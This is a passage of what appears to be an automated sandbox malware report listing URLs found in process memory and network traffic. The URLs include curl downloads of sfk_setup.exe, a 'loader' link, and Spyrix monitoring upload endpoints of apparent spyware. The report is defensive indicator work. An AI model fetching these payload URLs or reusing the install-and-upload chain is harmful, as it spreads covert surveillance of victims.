Source: [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program?email=
Source: spkl.exe, 00000035.00000002.2971872040.00000000044E6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/ix.com/
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/qqS
Source: spkl.exe, 00000035.00000002.2980946676.0000000006BBA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/x.com/
Source: [space]= .exe, 00000006.00000002.1984705669.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700375385.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1700541419.000001295C1A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700285153.000001295C1BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1700541419.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404.=
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404103
Source: curl.exe, 00000005.00000003.1700375385.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700285153.000001295C1BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1700541419.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/4047
Source: curl.exe, 00000005.00000003.1700375385.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700285153.000001295C1BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1700541419.000001295C1BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404E
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404Winsta0
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404curl.exe
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404k
Source: curl.exe, 00000005.00000002.1700541419.000001295C1A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404l=
Source: curl.exe, 00000005.00000003.1699852631.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1699926974.000001295C1C3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700101956.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700234054.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, [space]= .exe, 00000006.00000002.1984705669.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
Source: [space]= .exe, 00000006.00000002.1984705669.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s108
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000007.00000003.1705313181.000002BE1752F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000007.00000003.1705313181.000002BE174A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: curl.exe, 00000005.00000003.1699852631.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1699926974.000001295C1C3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700101956.000001295C21F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1700234054.000001295C21F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://securcdn.com/loader/link.php?prg_id=sfkupowershell.exe
Source: [space]= .exe, 00000012.00000003.2049227259.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2583732673.000000000226E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.0000000003240000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.00000000032C7000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step1
Source: [space]= .exe, 00000012.00000003.2049227259.0000000002440000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000012.00000003.2583732673.000000000226E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.0000000003240000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2562658084.00000000032C7000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step18
Source: [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step2
Source: spkl.exe, spkl.exe, 00000035.00000002.2980946676.0000000006C57000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/Uwas771wvshs7916gjqg62417/core.php
Source: spkl.exe, 00000035.00000003.2740720036.0000000001717000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/das
Source: [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/av
Source: qrl.exe, qrl.exe, 00000045.00000002.2766389640.0000000001790000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.2767714695.0000000001C5C000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.2767395081.0000000001C50000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000003.2745075392.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000003.2728540283.000000000145A000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2764912066.000000000145C000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2757133303.0000000001450000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2745068935.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768330875.0000000001550000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768430811.000000000155C000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768473168.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actions
Source: qrl.exe, 00000043.00000002.2715156517.00000000017E0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000043.00000002.2715484537.0000000001C60000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000043.00000002.2715104232.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.2766389640.0000000001790000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.2745815664.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2743891212.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2745068935.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768473168.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsC:
Source: qrl.exe, 0000004A.00000002.2768473168.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsJ
Source: qrl.exe, 00000047.00000002.2757133303.0000000001450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionse
Source: qrl.exe, 00000047.00000002.2757133303.0000000001450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsers
Source: qrl.exe, 00000043.00000003.2708573105.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000043.00000002.2715615199.0000000001C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsll
Source: qrl.exe, 00000043.00000002.2715484537.0000000001C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsoad.spy
Source: qrl.exe, 00000045.00000002.2767395081.0000000001C50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsrDao
Source: qrl.exe, 0000004A.00000002.2768330875.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsriverDa
Source: qrl.exe, 00000045.00000002.2767395081.0000000001C50000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004A.00000002.2768330875.0000000001550000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionstps://s
Source: qrl.exe, 00000047.00000003.2728540283.000000000145A000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2764912066.000000000145C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu
Source: qrl.exe, 0000004A.00000002.2768430811.000000000155C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu/
Source: qrl.exe, 00000045.00000002.2767714695.0000000001C5C000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000003.2745075392.0000000001C5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu7
Source: spkl.exe, 00000035.00000003.2871385145.0000000001925000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2958710472.0000000001910000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsv
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/proxy/upload
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/rand.zip
Source: spkl.exe, spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/
Source: [space]= .tmp, 00000013.00000003.2562658084.0000000003303000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/access.txt
Source: [space]= .tmp, 00000013.00000003.2574644811.00000000021A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iorder.php?comp_id=
Source: spkl.exe, spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iupload.php
Source: [space]= .tmp, 00000013.00000002.2581949502.0000000005460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spy
Source: WMIC.exe, 00000017.00000002.2085761747.000000000311C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-
Source: [space]= .tmp, 00000013.00000002.2581949502.0000000005460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/down
Source: [space]= .tmp, 00000013.00000002.2580954136.0000000002320000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000002.2085761747.0000000003151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk
Source: spmm.exe, 00000049.00000002.2923596949.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_set
Source: curl.exe, 0000000D.00000002.2046191187.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp, [space]= .exe, 00000012.00000002.2586374325.0000000000648000.00000004.00000020.00020000.00000000.sdmp, [space]= .exe, 00000012.00000002.2586638070.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000002.2580954136.0000000002320000.00000004.00000020.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000002.2578906847.0000000000708000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000002.2085634026.0000000002F70000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000002.2085761747.000000000311C000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000002.2085761747.0000000003110000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000003.2103285428.000000000348E000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000003.2103164321.000000000348A000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000002.2103797195.0000000003680000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000003.2103090156.000000000346F000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000002.2103625685.000000000348E000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000003.2103190131.000000000348D000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000002.2103523638.0000000003468000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001E.00000002.2105431680.000001FF662F9000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001E.00000002.2105518021.000001FF665A0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002C.00000002.2299657776.0000012BE9AE0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002C.00000002.2299431092.0000012BE97F7000.00000004.00000020.00020000.00000000.sdmp, regedit.exe, 00000032.00000002.2534356479.0000000003770000.00000004.00000020.00020000.00000000.sdmp, regedit.exe, 00000032.00000002.2534261099.00000000034D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: [space]= .tmp, 00000013.00000002.2578906847.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe.
Source: wscript.exe, 00000036.00000002.2553718613.0000000003448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe4
Source: [space]= .tmp, 00000013.00000002.2578906847.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe7
Source: curl.exe, 0000000D.00000002.2046191187.0000000002ED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeF
Source: timeout.exe, 0000003D.00000002.2614824930.0000000002E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPD
Source: qrl.exe, 0000004A.00000002.2768473168.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000053.00000002.2775496566.0000000000570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
Source: [space]= .tmp, 00000013.00000002.2581949502.0000000005460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDL
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2046256312.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeQ
Source: reg.exe, 0000001E.00000002.2105431680.000001FF662F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeR
Source: curl.exe, 0000000D.00000002.2046191187.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2046124324.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
Source: qrl.exe, 00000045.00000002.2766389640.0000000001798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeY.
Source: curl.exe, 0000000D.00000002.2046191187.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2046124324.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2046256312.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeg
Source: tasklist.exe, 00000056.00000003.2782882591.000000000318F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exekn
Source: [space]= .tmp, 00000013.00000002.2578906847.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exem(ac
Source: qrl.exe, 00000043.00000002.2715156517.00000000017E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exen
Source: regedit.exe, 00000032.00000002.2534356479.0000000003770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfkf
Source: regedit.exe, 00000032.00000002.2534356479.0000000003770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfkff
Source: spkl.exe, 00000035.00000002.2961326350.00000000033B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfko
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/repository.0
Source: spkl.exe	String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=open
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/drive
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/auth/userinfo.prof
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.profile
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/about
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/drive/v2/files
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files/
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files/U
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files?maxResults=1000&q=
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/filesU
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: spkl.exe, spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files/
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumable
Source: spkl.exe, 00000035.00000002.2923493069.0000000000401000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000003.2550383526.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumableSV
Source: spkl.exe, 00000035.00000002.2933829318.0000000000915000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2555270269.00000000044CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.com
Source: spkl.exe, 00000035.00000002.2933829318.0000000000915000.00000040.00000001.01000000.00000014.sdmp, spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2555270269.00000000044CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfk
Source: spkl.exe, 00000035.00000002.2980946676.0000000006C28000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.come

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
